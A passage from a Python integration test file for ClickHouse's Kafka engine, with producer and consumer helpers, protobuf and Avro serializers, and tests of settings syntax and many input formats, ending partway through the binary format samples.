print("Waiting for Kafka to start up")
time.sleep(1)
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_produce(topic, messages, timestamp=None, retries=2):
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer, retries=retries, max_in_flight_requests_per_connection=1)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(max_retries=50):
kafka_produce('test_heartbeat_topic', ['test'], retries=max_retries)
def kafka_consume(topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:9092", auto_offset_reset="earliest")
consumer.subscribe(topics=(topic))
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
yield message.value.decode()
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
print(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:9092")
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
print("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
print(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
bytes_writer = io.BytesIO()
# writer = avro.io.DatumWriter(schema)
# encoder = avro.io.BinaryEncoder(bytes_writer)
# writer.write(value, encoder)
# DataFileWrite seems to be mandatory to get schema encoded
writer = avro.datafile.DataFileWriter(bytes_writer, avro.io.DatumWriter(), schema)
if isinstance(value, list):
for v in value:
writer.append(v)
else:
writer.append(value)
writer.flush()
raw_bytes = bytes_writer.getvalue()
writer.close()
bytes_writer.close()
return raw_bytes
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
def describe_consumer_group(name):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
consumer_groups = admin_client.describe_consumer_groups([name])
res = []
for member in consumer_groups[0].members:
member_info = {}
member_info['member_id'] = member.member_id
member_info['client_id'] = member.client_id
member_info['client_host'] = member.client_host
member_topics_assignment = []
for (topic, partitions) in member.member_assignment.assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
global kafka_id
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
wait_kafka_is_available() # ensure kafka is alive
kafka_producer_send_heartbeat_msg() # ensure python kafka client is ok
# print("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
# Insert couple of malformed messages.
kafka_produce('new', ['}{very_broken_message,'])
kafka_produce('new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('new')
assert members[0]['client_id'] == 'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_json_as_string(kafka_cluster):
kafka_produce('kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: 1) return no rows")
@pytest.mark.timeout(120)
def test_kafka_formats(kafka_cluster):
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
# 'Template' : {
# 'data_sample' : [
# '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '' # tolerates
# ],
# 'extra_settings': ", format_template_row='template_row.format'"
# },
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': r", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.h:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
